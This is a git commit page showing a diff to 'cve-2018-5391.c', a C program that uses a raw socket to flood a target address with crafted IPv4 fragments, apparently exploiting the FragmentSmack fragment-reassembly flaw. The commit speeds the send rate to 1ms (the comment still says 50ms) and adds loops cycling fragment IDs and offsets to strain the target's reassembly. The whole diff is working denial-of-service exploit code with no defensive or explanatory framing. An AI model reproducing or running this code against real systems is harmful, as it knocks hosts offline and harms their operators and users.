diff options
| author | Toni Uhlig <matzeton@googlemail.com> | 2018-09-30 18:06:57 +0200 |
|---|---|---|
| committer | Toni Uhlig <matzeton@googlemail.com> | 2018-09-30 18:06:57 +0200 |
| commit | 42c2a6710f55686dd965d2e3ffe1761994fce752 (patch) | |
| tree | d7195e0acb27f08e42842ef7c08332349a2268eb | |
| parent | 293a5a32e5c040872e85a636942caed6258da32a (diff) | |
*brrrrĀ²*
Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
| -rw-r--r-- | cve-2018-5391.c | 41 |
1 files changed, 32 insertions, 9 deletions
diff --git a/cve-2018-5391.c b/cve-2018-5391.c index 9f16d7e..0bfa2f4 100644 --- a/cve-2018-5391.c +++ b/cve-2018-5391.c @@ -58,7 +58,9 @@ int main(int argc, char **argv) int s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); int r, val = 1; size_t data_size = 896 - sizeof *ip; - useconds_t send_rate = 50 * 1000; /* 50ms */ + useconds_t send_rate = 1 * 1000; /* 50ms */ + size_t cur_frags, max_frags = 64; + uint16_t id, max_bucket = 32; die_on_error("socket", s < 0); @@ -79,8 +81,8 @@ int main(int argc, char **argv) ip->tos = 0; ip->tot_len = data_size - sizeof(struct iphdr); assert(ip->tot_len <= PKG_BUF); - ip->id = htonl(0xDEAD); - ip->frag_off = htonl(0xBEEF); + ip->id = 0; + ip->frag_off = 0; ip->ttl = 255; ip->protocol = IPPROTO_IP; ip->check = 0; @@ -92,16 +94,37 @@ int main(int argc, char **argv) dest.sin_addr.s_addr = inet_addr(argv[2]); srandom(time(NULL)); + cur_frags = 0; while (1) { + if (cur_frags % max_frags == 0) { + ip->frag_off &= 0xFF1F; + id = ip->id; + for (uint16_t i = 0; i < max_bucket; ++i) { + ip->id = htons(id + i); + r = sendto(s, pkg, ip->tot_len, 0, (struct sockaddr *) &dest, sizeof dest); + die_on_error("sendto", r != ip->tot_len); + } + ip->id = id; + + ip->id = (uint16_t) random(); + ip->frag_off = 0x0020; + printf("ip->id = %u\n", ip->id); + } + //ip->saddr = (uint32_t) random(); - ip->frag_off = (uint16_t) random(); - ip->frag_off &= 0xFF1F; /* zero reserved,dont-frag,more-frag (little-endian) */ - ip->frag_off |= 0x0020; /* force more-frag set (little-endian) */ - ip->id = (uint16_t) random(); - r = sendto(s, pkg, ip->tot_len, 0, (struct sockaddr *) &dest, sizeof dest); - die_on_error("sendto", r != ip->tot_len); + id = ip->id; + for (uint16_t i = 0; i < max_bucket; ++i) { + ip->id = htons(id + i); + r = sendto(s, pkg, ip->tot_len, 0, (struct sockaddr *) &dest, sizeof dest); + die_on_error("sendto", r != ip->tot_len); + } + ip->id = id; usleep(send_rate); + printf("%zu: ipd->id = %04X , ip->frag_off = %04X\n", cur_frags, + ip->id, ntohs(ip->frag_off)); + ip->frag_off += htons(8); + cur_frags++; } return 0; |